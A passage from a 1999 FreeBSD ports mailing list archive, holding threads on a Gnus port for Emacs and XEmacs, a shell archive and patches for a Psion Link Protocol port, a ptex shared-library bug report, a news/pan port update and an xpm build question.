+share/emacs/site-lisp/mm-bodies.elc +share/emacs/site-lisp/mm-decode.elc +share/emacs/site-lisp/mm-encode.elc +share/emacs/site-lisp/mm-util.elc +share/emacs/site-lisp/mm-uu.elc +share/emacs/site-lisp/mm-view.elc +share/emacs/site-lisp/mml.elc +share/emacs/site-lisp/nnagent.elc +share/emacs/site-lisp/nnbabyl.elc +share/emacs/site-lisp/nndb.elc +share/emacs/site-lisp/nndir.elc +share/emacs/site-lisp/nndoc.elc +share/emacs/site-lisp/nndraft.elc +share/emacs/site-lisp/nneething.elc +share/emacs/site-lisp/nnfolder.elc +share/emacs/site-lisp/nngateway.elc +share/emacs/site-lisp/nnheader.elc +share/emacs/site-lisp/nnimap.elc +share/emacs/site-lisp/nnkiboze.elc +share/emacs/site-lisp/nnmail.elc +share/emacs/site-lisp/nnmbox.elc +share/emacs/site-lisp/nnmh.elc +share/emacs/site-lisp/nnml.elc +share/emacs/site-lisp/nnoo.elc +share/emacs/site-lisp/nnsoup.elc +share/emacs/site-lisp/nnspool.elc +share/emacs/site-lisp/nntp.elc +share/emacs/site-lisp/nnvirtual.elc +share/emacs/site-lisp/parse-time.elc +share/emacs/site-lisp/pop3.elc +share/emacs/site-lisp/qp.elc +share/emacs/site-lisp/rfc1843.elc +share/emacs/site-lisp/rfc2045.elc +share/emacs/site-lisp/rfc2047.elc +share/emacs/site-lisp/rfc2104.elc +share/emacs/site-lisp/rfc2231.elc +share/emacs/site-lisp/score-mode.elc +share/emacs/site-lisp/time-date.elc +share/emacs/site-lisp/uudecode.elc --=-=-=-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Nov 30 2: 9:57 1999 Delivered-To: freebsd-ports@freebsd.org Received: from cip12.melaten.rwth-aachen.de (cip12.melaten.RWTH-Aachen.DE [134.130.92.12]) by hub.freebsd.org (Postfix) with ESMTP id 3A47D1580D for ; Tue, 30 Nov 1999 02:09:54 -0800 (PST) (envelope-from tg@melaten.rwth-aachen.de) Received: (from tg@localhost) by cip12.melaten.rwth-aachen.de (8.9.3/8.9.3) id LAA36245; Tue, 30 Nov 1999 11:10:47 +0100 (CET) (envelope-from tg) To: Dag-Erling Smorgrav Cc: ports@FreeBSD.ORG Subject: Re: pgnus-0.98 References: From: Thomas Gellekum In-Reply-To: Dag-Erling Smorgrav's message of "30 Nov 1999 11:03:18 +0100" Date: 30 Nov 1999 11:10:46 +0100 Message-ID: Lines: 9 User-Agent: Gnus/5.070098 (Pterodactyl Gnus v0.98) XEmacs/20.4 (Emerald) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Dag-Erling Smorgrav writes: > Attached are patches for a port of Pterodactyl Gnus 0.98. Any comments > before I import it? 1. portlint 2. what about XEmacs? tg To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Nov 30 2:19:38 1999 Delivered-To: freebsd-ports@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 725F915937 for ; Tue, 30 Nov 1999 02:19:17 -0800 (PST) (envelope-from des@flood.ping.uio.no) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id LAA98699; Tue, 30 Nov 1999 11:18:00 +0100 (CET) (envelope-from des) To: Thomas Gellekum Cc: ports@FreeBSD.ORG Subject: Re: pgnus-0.98 References: From: Dag-Erling Smorgrav Date: 30 Nov 1999 11:18:00 +0100 In-Reply-To: Thomas Gellekum's message of "30 Nov 1999 11:10:46 +0100" Message-ID: Lines: 11 User-Agent: Gnus/5.070097 (Pterodactyl Gnus v0.97) Emacs/20.4 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Thomas Gellekum writes: > 2. what about XEmacs? Tricky. Also, the port explicitly requires Emacs 20.4 although Emacs 20.3 (and possibly also earlier versions of Emacs 20) will do fine. Maybe bsd.port*.mk should contain code to check for the presence of "some kind of Emacs", like they do for X, Qt, GTK etc. DES -- Dag-Erling Smorgrav - des@flood.ping.uio.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Nov 30 2:20: 8 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id F270815833 for ; Tue, 30 Nov 1999 02:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id CAA16258; Tue, 30 Nov 1999 02:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from lotl.clari.net.au (lotl.clari.net.au [203.26.127.210]) by hub.freebsd.org (Postfix) with ESMTP id AA16F15471 for ; Tue, 30 Nov 1999 02:14:01 -0800 (PST) (envelope-from maurice@atum.castro.aus.net) Received: (from uucp@localhost) by lotl.clari.net.au (8.9.3/8.9.1) with UUCP id VAA09745 for FreeBSD-gnats-submit@freebsd.org; Tue, 30 Nov 1999 21:13:59 +1100 (EST) (envelope-from maurice@atum.castro.aus.net) Received: from atum.castro.aus.net (atum.castro.aus.net [203.8.14.82]) by horus.castro.aus.net (8.8.5/8.8.5) with ESMTP id UAA02156 for ; Tue, 30 Nov 1999 20:29:14 +1100 (EST) Received: (from root@localhost) by atum.castro.aus.net (8.9.3/8.9.3) id UAA34636; Tue, 30 Nov 1999 20:28:10 +1100 (EST) (envelope-from maurice) Message-Id: <199911300928.UAA34636@atum.castro.aus.net> Date: Tue, 30 Nov 1999 20:28:10 +1100 (EST) From: Maurice Castro Reply-To: maurice@atum.castro.aus.net To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15181: PLP port Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15181 >Category: ports >Synopsis: Supercedes ports/15179 >Confidential: no >Severity: critical >Priority: high >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Tue Nov 30 02:20:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Maurice Castro >Release: FreeBSD 3.2-RELEASE i386 >Organization: Software Engineering Research Centre >Environment: All >Description: Previous plp port had major flaws when trialed on 3rd party systems this replacement port avoids the problems >How-To-Repeat: As follows >Fix: # This is a shell archive. Save it in a file, remove anything before # this line, and then unpack it by entering "sh file". Note, it may # create directories; files and directories will be owned by you and # have default permissions. # # This archive contains: # # plp # plp/Makefile # plp/files # plp/files/md5 # plp/patches # plp/patches/patch-aa # plp/patches/patch-ab # plp/patches/patch-ac # plp/patches/patch-ad # plp/pkg # plp/pkg/PLIST # plp/pkg/DESCR # plp/pkg/COMMENT # echo c - plp mkdir -p plp > /dev/null 2>&1 echo x - plp/Makefile sed 's/^X//' >plp/Makefile << 'END-of-plp/Makefile' X# New ports collection makefile for: Psion Link Protocol X# Version required: 1.8 X# Date created: Tue Nov 30 15:43:27 EST 1999 X# Whom: Maurice Castro X# X# $Id$ X# X XDISTNAME= plp_1_8 XPKGNAME= plp-1.8 XCATEGORIES= comms XMASTER_SITES= http://www.proudman51.freeserve.co.uk/psion/ X XMAINTAINER= maurice@serc.rmit.edu.au X XUSE_GMAKE= yes X Xdo-install: X ${INSTALL_PROGRAM} ${WRKSRC}/bin/ncp ${PREFIX}/bin X ${INSTALL_PROGRAM} ${WRKSRC}/bin/rfsv ${PREFIX}/bin X X.include END-of-plp/Makefile echo c - plp/files mkdir -p plp/files > /dev/null 2>&1 echo x - plp/files/md5 sed 's/^X//' >plp/files/md5 << 'END-of-plp/files/md5' XMD5 (plp_1_8.tar.gz) = 63c0871eb0504c69677c8e16f2d43ea2 END-of-plp/files/md5 echo c - plp/patches mkdir -p plp/patches > /dev/null 2>&1 echo x - plp/patches/patch-aa sed 's/^X//' >plp/patches/patch-aa << 'END-of-plp/patches/patch-aa' X*** ncp/mp_serial.c.dist Tue Nov 30 17:36:34 1999 X--- ncp/mp_serial.c Tue Nov 30 17:37:10 1999 X*************** X*** 223,229 **** X void ser_exit(int fd) X { X struct termios ti; X! if(ioctl(fd, TCGETS, (caddr_t)&ti) < 0) { X perror("TCGETSW"); X } X ti.c_cflag &= ~CRTSCTS; X--- 223,229 ---- X void ser_exit(int fd) X { X struct termios ti; X! if(tcgetattr(fd, &ti) < 0) { X perror("TCGETSW"); X } X ti.c_cflag &= ~CRTSCTS; END-of-plp/patches/patch-aa echo x - plp/patches/patch-ab sed 's/^X//' >plp/patches/patch-ab << 'END-of-plp/patches/patch-ab' X*** defaults.h.dist Tue Nov 30 17:39:40 1999 X--- defaults.h Tue Nov 30 17:40:09 1999 X*************** X*** 19,25 **** X X // This is the default device driver for the serial link X // N.B. This was "/dev/cua1" in the previous release X! #define DEFAULT_SERIAL_DEVICE "/dev/ttyS1" X X // This is the default drive to use on the psion X #define DEFAULT_DRIVE "C:\\" X--- 19,25 ---- X X // This is the default device driver for the serial link X // N.B. This was "/dev/cua1" in the previous release X! #define DEFAULT_SERIAL_DEVICE "/dev/psion" X X // This is the default drive to use on the psion X #define DEFAULT_DRIVE "C:\\" END-of-plp/patches/patch-ab echo x - plp/patches/patch-ac sed 's/^X//' >plp/patches/patch-ac << 'END-of-plp/patches/patch-ac' X*** ncp/mp_serial.c.dist Tue Nov 30 19:16:09 1999 X--- ncp/mp_serial.c Tue Nov 30 19:13:52 1999 X*************** X*** 192,198 **** X #if defined(hpux) || defined(_IBMR2) X ti.c_cflag = CS8 | HUPCL | clocal | CREAD; X #endif X! #if defined(sun) || defined(linux) || defined(__sgi) || defined(__NetBSD__) X ti.c_cflag = CS8 | HUPCL | clocal | CRTSCTS | CREAD; X ti.c_iflag = IGNBRK | IGNPAR; X ti.c_cc[VMIN] = 1; X--- 192,198 ---- X #if defined(hpux) || defined(_IBMR2) X ti.c_cflag = CS8 | HUPCL | clocal | CREAD; X #endif X! #if defined(sun) || defined(linux) || defined(__sgi) || defined(__NetBSD__) || defined(__FreeBSD__) X ti.c_cflag = CS8 | HUPCL | clocal | CRTSCTS | CREAD; X ti.c_iflag = IGNBRK | IGNPAR; X ti.c_cc[VMIN] = 1; END-of-plp/patches/patch-ac echo x - plp/patches/patch-ad sed 's/^X//' >plp/patches/patch-ad << 'END-of-plp/patches/patch-ad' X*** rfsv/main.cc.dist Tue Nov 30 20:07:13 1999 X--- rfsv/main.cc Tue Nov 30 20:04:01 1999 X*************** X*** 107,113 **** X X skt = new ppsocket(); X skt->startup(); X! res = skt->connect(NULL, sockNum); X if (!res) { X delete skt; X X--- 107,113 ---- X X skt = new ppsocket(); X skt->startup(); X! res = skt->connect("127.0.0.1", sockNum); X if (!res) { X delete skt; X X*************** X*** 120,126 **** X usleep(100000); X skt = new ppsocket(); X skt->startup(); X! res = skt->connect(NULL, sockNum); X if (!res) delete skt; X } X X--- 120,126 ---- X usleep(100000); X skt = new ppsocket(); X skt->startup(); X! res = skt->connect("127.0.0.1", sockNum); X if (!res) delete skt; X } X END-of-plp/patches/patch-ad echo c - plp/pkg mkdir -p plp/pkg > /dev/null 2>&1 echo x - plp/pkg/PLIST sed 's/^X//' >plp/pkg/PLIST << 'END-of-plp/pkg/PLIST' Xbin/ncp Xbin/rfsv END-of-plp/pkg/PLIST echo x - plp/pkg/DESCR sed 's/^X//' >plp/pkg/DESCR << 'END-of-plp/pkg/DESCR' XPLP implements the Psion Link Protocol. X XThis program is used to transfer data between a Psion Series 5mx X(default) or Psion Series 5 to a Unix server. The ncp daemon is Xstarted to communicate with the Psion and an ftp like interface is Xprovided by rfsv. X XBefore using this port it is necessary to either X X a) create a symbolic link form the serial port the psion is X connected to to /dev/psion eg ln -s /dev/cuaa0 /dev/psion X Xor X X b) start the ncp daemon with the correct serial port eg X ncp -s 7501 -d /dev/cuaa0 -s5 END-of-plp/pkg/DESCR echo x - plp/pkg/COMMENT sed 's/^X//' >plp/pkg/COMMENT << 'END-of-plp/pkg/COMMENT' XTransfer data between a Psion Series 5(mx) and Unix. END-of-plp/pkg/COMMENT exit >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Nov 30 2:33: 4 1999 Delivered-To: freebsd-ports@freebsd.org Received: from cip12.melaten.rwth-aachen.de (cip12.melaten.RWTH-Aachen.DE [134.130.92.12]) by hub.freebsd.org (Postfix) with ESMTP id 4F16C15889 for ; Tue, 30 Nov 1999 02:33:01 -0800 (PST) (envelope-from tg@melaten.rwth-aachen.de) Received: (from tg@localhost) by cip12.melaten.rwth-aachen.de (8.9.3/8.9.3) id LAA36395; Tue, 30 Nov 1999 11:33:57 +0100 (CET) (envelope-from tg) To: Dag-Erling Smorgrav Cc: ports@FreeBSD.ORG Subject: Re: pgnus-0.98 References: From: Thomas Gellekum In-Reply-To: Dag-Erling Smorgrav's message of "30 Nov 1999 11:18:00 +0100" Date: 30 Nov 1999 11:33:56 +0100 Message-ID: Lines: 23 User-Agent: Gnus/5.070098 (Pterodactyl Gnus v0.98) XEmacs/20.4 (Emerald) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Dag-Erling Smorgrav writes: > Thomas Gellekum writes: > > 2. what about XEmacs? > > Tricky. Yup. :-) > Also, the port explicitly requires Emacs 20.4 although Emacs > 20.3 (and possibly also earlier versions of Emacs 20) will do fine. > Maybe bsd.port*.mk should contain code to check for the presence of > "some kind of Emacs", like they do for X, Qt, GTK etc. You'd need to set the site-lisp directory for each. And if both are installed, you'll want to compile the files for both. And adapt the PLIST. I think the simple solution would be two ports, gnus-emacs and gnus-xemacs, with one of them being a ``master'' port. Look at lang/python-doc-* for an example. tg To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Nov 30 3: 1:17 1999 Delivered-To: freebsd-ports@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 9951B14CE2 for ; Tue, 30 Nov 1999 03:01:15 -0800 (PST) (envelope-from des@flood.ping.uio.no) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id LAA98833; Tue, 30 Nov 1999 11:59:57 +0100 (CET) (envelope-from des) To: Thomas Gellekum Cc: ports@FreeBSD.ORG Subject: Re: pgnus-0.98 References: From: Dag-Erling Smorgrav Date: 30 Nov 1999 11:59:57 +0100 In-Reply-To: Thomas Gellekum's message of "30 Nov 1999 11:33:56 +0100" Message-ID: Lines: 11 User-Agent: Gnus/5.070097 (Pterodactyl Gnus v0.97) Emacs/20.4 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Thomas Gellekum writes: > I think the simple solution would be two ports, gnus-emacs and > gnus-xemacs, with one of them being a ``master'' port. Look at > lang/python-doc-* for an example. Oh. Now I remember why I didn't want to get involved with ports. If somebody feels like fixing and committing the pgnus port, feel free. DES -- Dag-Erling Smorgrav - des@flood.ping.uio.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Nov 30 4:10: 7 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id DF76D1587C for ; Tue, 30 Nov 1999 04:10:00 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id EAA26250; Tue, 30 Nov 1999 04:10:00 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from limmax.k2r.org (limmax.k2r.org [210.160.188.69]) by hub.freebsd.org (Postfix) with SMTP id A959A15878 for ; Tue, 30 Nov 1999 04:07:42 -0800 (PST) (envelope-from kenji@k2r.org) Received: (qmail 59971 invoked by uid 1000); 30 Nov 1999 12:05:02 -0000 Message-Id: <19991130120502.59970.qmail@k2r.org> Date: 30 Nov 1999 12:05:02 -0000 From: kenji.rikitake@acm.org Reply-To: kenji.rikitake@acm.org To: FreeBSD-gnats-submit@freebsd.org Cc: kenji.rikitake@acm.org X-Send-Pr-Version: 3.2 Subject: ports/15184: ja-ptex-common-2.1.8 fails to execute on 3.3-RELEASE Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15184 >Category: ports >Synopsis: ja-ptex-common-2.1.8 fails to execute on 3.3-RELEASE >Confidential: no >Severity: critical >Priority: high >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Nov 30 04:10:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Kenji Rikitake >Release: FreeBSD 3.3-RELEASE i386 >Organization: >Environment: FreeBSD 3.3-RELEASE >Description: when compiling the package ja-ptex-common-2.1.8 from the 3.3-RELEASE ports collection at japanese/ptex-common, the compiled executable does not run with the error message from /usr/libexec/ld-so.elf of 'libkpathsea.so.* not found'. >How-To-Repeat: cd /usr/ports/japanese/ptex-common make make install rehash ptex >Fix: Disabling using shared library solves this issue, by removing the --enable-shared option on DO_CONFIGURE in the Makefile. *** Makefile.FCS Tue Aug 31 15:46:14 1999 --- Makefile Tue Nov 30 20:47:22 1999 *************** *** 38,40 **** ac_cv_path_install="/usr/bin/install -c -o ${BINOWN} -g ${BINGRP}" \ ! ./configure --prefix=${PREFIX} --enable-shared) --- 38,40 ---- ac_cv_path_install="/usr/bin/install -c -o ${BINOWN} -g ${BINGRP}" \ ! ./configure --prefix=${PREFIX} ) >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Nov 30 5:20:19 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 35539158B8 for ; Tue, 30 Nov 1999 05:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id FAA31584; Tue, 30 Nov 1999 05:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from pawn.primelocation.net (pawn.primelocation.net [205.161.238.235]) by hub.freebsd.org (Postfix) with ESMTP id 2750E14D80 for ; Tue, 30 Nov 1999 05:11:07 -0800 (PST) (envelope-from jedgar@pawn.primelocation.net) Received: by pawn.primelocation.net (Postfix, from userid 1003) id 231AE9B36; Tue, 30 Nov 1999 08:11:07 -0500 (EST) Message-Id: <19991130131107.231AE9B36@pawn.primelocation.net> Date: Tue, 30 Nov 1999 08:11:07 -0500 (EST) From: jedgar@fxp.org Reply-To: jedgar@fxp.org To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15185: Update port: news/pan Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15185 >Category: ports >Synopsis: Update port: news/pan >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Tue Nov 30 05:20:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Chris D. Faulhaber >Release: FreeBSD 3.3-STABLE i386 >Organization: BUGO - BSD Users Group of Orlando >Environment: FreeBSD 3.3-STABLE i386 >Description: Update port: news/pan * Update to 0.6.4 * Replaced gdbm with db (much faster now) * Added Italian translations * Integrated most of patches/* * Removed unneeded gmake dependency * etc... >How-To-Repeat: >Fix: Index: Makefile =================================================================== RCS file: /home/ncvs/ports/news/pan/Makefile,v retrieving revision 1.8 diff -u -r1.8 Makefile --- Makefile 1999/11/17 22:49:32 1.8 +++ Makefile 1999/11/30 13:00:56 @@ -1,26 +1,24 @@ # New ports collection makefile for: pan -# Version required: 0.6.3 +# Version required: 0.6.4 # Date created: 07 August 1999 # Whom: Chris D. Faulhaber # # $FreeBSD: ports/news/pan/Makefile,v 1.8 1999/11/17 22:49:32 jim Exp $ # -DISTNAME= pan-0.6.3 +DISTNAME= pan-0.6.4 CATEGORIES= news gnome MASTER_SITES= ftp://source.rebelbase.com/pub/pan/ MAINTAINER= jedgar@fxp.org -LIB_DEPENDS= gdbm.2:${PORTSDIR}/databases/gdbm \ - gnome.3:${PORTSDIR}/x11/gnomelibs +LIB_DEPENDS= gnome.3:${PORTSDIR}/x11/gnomelibs GLIB_CONFIG?= ${LOCALBASE}/bin/glib12-config GTK_CONFIG?= ${X11BASE}/bin/gtk12-config USE_BZIP2= yes USE_X_PREFIX= yes -USE_GMAKE= yes GNU_CONFIGURE= yes CONFIGURE_ARGS= --with-x CONFIGURE_ENV+= CFLAGS="-I${LOCALBASE}/include ${CFLAGS}" \ Index: files/md5 =================================================================== RCS file: /home/ncvs/ports/news/pan/files/md5,v retrieving revision 1.8 diff -u -r1.8 md5 --- md5 1999/11/17 22:49:38 1.8 +++ md5 1999/11/30 13:00:56 @@ -1 +1 @@ -MD5 (pan-0.6.3.tar.bz2) = ac1f59a22fd6ef9763e05fe7a2328c67 +MD5 (pan-0.6.4.tar.bz2) = a694991bdcd97940a101290f8f66dbab Index: patches/patch-ab =================================================================== RCS file: /home/ncvs/ports/news/pan/patches/patch-ab,v retrieving revision 1.2 diff -u -r1.2 patch-ab --- patch-ab 1999/11/17 22:49:38 1.2 +++ patch-ab 1999/11/30 13:00:56 @@ -1,55 +1,10 @@ ---- pan/post.c.orig Wed Oct 20 22:18:44 1999 -+++ pan/post.c Wed Oct 20 22:19:06 1999 -@@ -18,6 +18,9 @@ +--- pan/acache.c.orig Sat Nov 27 19:19:45 1999 ++++ pan/acache.c Tue Nov 30 07:38:01 1999 +@@ -18,7 +18,6 @@ * */ -+#include -+#include -+#include - #include - #include - #include ---- pan/acache.c.orig Wed Nov 3 19:27:40 1999 -+++ pan/acache.c Mon Nov 15 21:04:33 1999 -@@ -18,8 +18,8 @@ - * - */ - -#include #include -+#include #include #include - #include ---- pan/db.c.orig Sat Nov 13 11:53:16 1999 -+++ pan/db.c Mon Nov 15 21:05:26 1999 -@@ -23,8 +23,8 @@ - [ ] transparent (de)compression of database (bzip2 preferably) - */ - --#include - #include -+#include - - //#include - //#include ---- pan/statistics.c.orig Wed Nov 3 19:27:42 1999 -+++ pan/statistics.c Mon Nov 15 21:06:49 1999 -@@ -59,7 +59,6 @@ - gushort len; - gshort i = 0; - gushort j = 0; -- gushort k = 0; - - string = g_strdup_printf ("%ld", num); - len = strlen (string); -@@ -95,7 +94,7 @@ - gchar * - stats_make_time_online_string (void) - { -- gchar *p; -+ gchar *p = NULL; - gushort mins, hours; - gulong onlinetime; - Index: patches/patch-ac =================================================================== RCS file: /home/ncvs/ports/news/pan/patches/patch-ac,v retrieving revision 1.1 diff -u -r1.1 patch-ac --- patch-ac 1999/11/17 22:49:38 1.1 +++ patch-ac 1999/11/30 13:00:56 @@ -1,48 +1,20 @@ ---- uulib/Makefile.in.orig Mon Nov 15 05:01:18 1999 -+++ uulib/Makefile.in Mon Nov 15 20:53:54 1999 -@@ -115,7 +115,7 @@ - libuu_a_LIBADD = uulib.o uucheck.o uunconc.o uuutil.o uuencode.o uuscan.o uustring.o fptools.o +--- pan/gui.c.orig Mon Nov 29 11:40:33 1999 ++++ pan/gui.c Tue Nov 30 07:52:02 1999 +@@ -760,7 +760,7 @@ + GTK_CTREE (Pan.article_ctree), + GTK_CLIST (Pan.article_ctree)->selection->data ); + if ( message_id ) { +- text_set_from_message_id ( message_id ); ++ text_set_from_message_id ( (gchar*) message_id ); + gtk_widget_grab_focus ( text ); + } +@@ -805,7 +805,7 @@ + if (gdata) + buf = g_strdup_printf ("Pan [%s]", gdata->name); + else +- buf = g_strdup_printf ("Pan", VERSION); ++ buf = g_strdup_printf ("Pan [%s]", VERSION); --CFLAGS = -O2 -+CFLAGS = @CFLAGS@ - mkinstalldirs = $(SHELL) $(top_srcdir)/mkinstalldirs - CONFIG_HEADER = ../config.h - CONFIG_CLEAN_FILES = ---- uulib/uuscan.c.orig Thu Sep 30 13:46:15 1999 -+++ uulib/uuscan.c Mon Nov 15 21:01:40 1999 -@@ -332,8 +332,8 @@ - ParseHeader (headers *theheaders, char *line) - { - char **variable=NULL; -- char *value, *ptr, *thenew; -- int delimit, length; -+ char *value=NULL, *ptr, *thenew; -+ int delimit=0, length; - - if (line == NULL) - return theheaders; -@@ -523,10 +523,10 @@ - char *line=uuscan_sdline, *bhds1=uuscan_sdbhds1, *bhds2=uuscan_sdbhds2; - static char *ptr, *p2, *p3=NULL, *bhdsp, bhl; - int bhflag=0, vflag, haddh=0, hadct=0; -- int bhrpc=0, bhnf=0, c, hcount, lcount, blen; -+ int bhrpc=0, bhnf=0, c, hcount, lcount, blen=0; - int encoding=0, dflag=0, ctline=42; - int dontcare=0, hadnl=0; -- long preheaders, oldposition; -+ long preheaders=0, oldposition; - size_t dcc, bhopc; - - *errcode = UURET_OK; -@@ -1100,8 +1100,8 @@ - ScanPart (FILE *datei, char *fname, int *errcode) - { - int ecount, hcount, lcount; -- int bhflag, begflag, vflag, blen, res; -- long preheaders, prevpos, preenc, before; -+ int bhflag, begflag, vflag, blen=0, res; -+ long preheaders, prevpos=0, preenc, before; - char *line=uuscan_spline; - fileread *result; - char *ptr1, *ptr2; + gtk_window_set_title (GTK_WINDOW (Pan.window), buf); + g_free (buf); Index: pkg/PLIST =================================================================== RCS file: /home/ncvs/ports/news/pan/pkg/PLIST,v retrieving revision 1.4 diff -u -r1.4 PLIST --- PLIST 1999/11/17 22:49:39 1.4 +++ PLIST 1999/11/30 13:00:56 @@ -1,6 +1,7 @@ bin/pan share/locale/da/LC_MESSAGES/pan.mo share/locale/es/LC_MESSAGES/pan.mo +share/locale/it/LC_MESSAGES/pan.mo share/locale/ja/LC_MESSAGES/pan.mo share/locale/ko/LC_MESSAGES/pan.mo share/locale/pl/LC_MESSAGES/pan.mo >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Nov 30 6: 8:23 1999 Delivered-To: freebsd-ports@freebsd.org Received: from www.mailme.dk (freemail.danbbs.dk [194.234.11.16]) by hub.freebsd.org (Postfix) with ESMTP id 098F9158D1 for ; Tue, 30 Nov 1999 06:08:20 -0800 (PST) (envelope-from chrd@mailme.dk) Received: from Debug (freemail.danbbs.dk [194.234.11.16]) by www.mailme.dk (8.9.3/8.9.3) with SMTP id PAA14347 for ; Tue, 30 Nov 1999 15:10:31 +0100 Message-Id: <199911301410.PAA14347@www.mailme.dk> To: FreeBSD-ports@FreeBSD.ORG From: "Christian D." Subject: xpm-3.4k Date: Tue, 30 Nov 1999 14:10:32 GMT X-Mailer: Endymion MailMan Professional Edition v1.0 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org xpm-3.4k will not compile fully under fbsd4.0-current when i try to compile the xpm-3.4k port it only compiles the libXpm.a and not libXpm.so. i this it has something to do with egcs 2.95.2 _______________________________________________________________ Få din egen gratis emailadresse! Danmarks hurtigste emailserver http://www.MailMe.dk er sponsoreret af http://www.DanBBS.dk To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Nov 30 6:14:48 1999 Delivered-To: freebsd-ports@freebsd.org Received: from pawn.primelocation.net (pawn.primelocation.net [205.161.238.235]) by hub.freebsd.org (Postfix) with ESMTP id 93B14158D1 for ; Tue, 30 Nov 1999 06:14:39 -0800 (PST) (envelope-from cdf.lists@fxp.org) Received: by pawn.primelocation.net (Postfix, from userid 1016) id AA7FC9B36; Tue, 30 Nov 1999 09:14:34 -0500 (EST) Received: from localhost (localhost [127.0.0.1]) by pawn.primelocation.net (Postfix) with ESMTP id A1B9CBA21; Tue, 30 Nov 1999 09:14:34 -0500 (EST) Date: Tue, 30 Nov 1999 09:14:34 -0500 (EST) From: "Chris D. Faulhaber" X-Sender: cdf.lists@pawn.primelocation.net To: "Christian D." Cc: FreeBSD-ports@FreeBSD.ORG Subject: Re: xpm-3.4k In-Reply-To: <199911301410.PAA14347@www.mailme.dk> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 30 Nov 1999, Christian D. wrote: > xpm-3.4k will not compile fully under fbsd4.0-current > > when i try to compile the xpm-3.4k port it only compiles the libXpm.a and not > libXpm.so. > i this it has something to do with egcs > 2.95.2 > This was fixed in the last week or so. Try rebuilding world with the latest sources. jedgar@earth:~$ ll /usr/X11R6/lib/libXpm* -rw-r--r-- 1 root wheel 94696 Nov 28 14:24 /usr/X11R6/lib/libXpm.a lrwxr-xr-x 1 root wheel 11 Nov 28 14:24 /usr/X11R6/lib/libXpm.so -> libXpm.so.4 -rwxr-xr-x 1 root wheel 59502 Nov 28 14:24 /usr/X11R6/lib/libXpm.so.4 jedgar@earth:~$ uname -a FreeBSD earth.fxp 4.0-CURRENT FreeBSD 